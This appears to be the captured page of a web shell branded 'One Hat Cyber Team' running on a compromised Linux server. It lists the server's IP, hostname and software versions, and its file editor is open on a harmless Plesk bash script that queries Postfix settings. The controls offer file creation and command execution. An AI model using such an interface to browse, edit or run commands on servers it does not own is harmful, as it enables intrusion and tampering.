⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.72
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
psa
/
admin
/
sbin
/
modules
/
log-browser
/
Edit File: postconf
#!/usr/bin/env bash # Copyright 1999-2024. WebPros International GmbH. All rights reserved. main() { local command="${1:?"Command must be specified as the first parameter"}" case "$command" in get-long-queue-ids-status) postconf -x enable_long_queue_ids | cut -d'=' -f2 | tr -d ' ' exit $? ;; get-hash-queue-depth) postconf -x hash_queue_depth | cut -d'=' -f2 | tr -d ' ' exit $? ;; *) echo "Unknown command: ${command}" >&2 exit 1 ;; esac } main "$@"
Simpan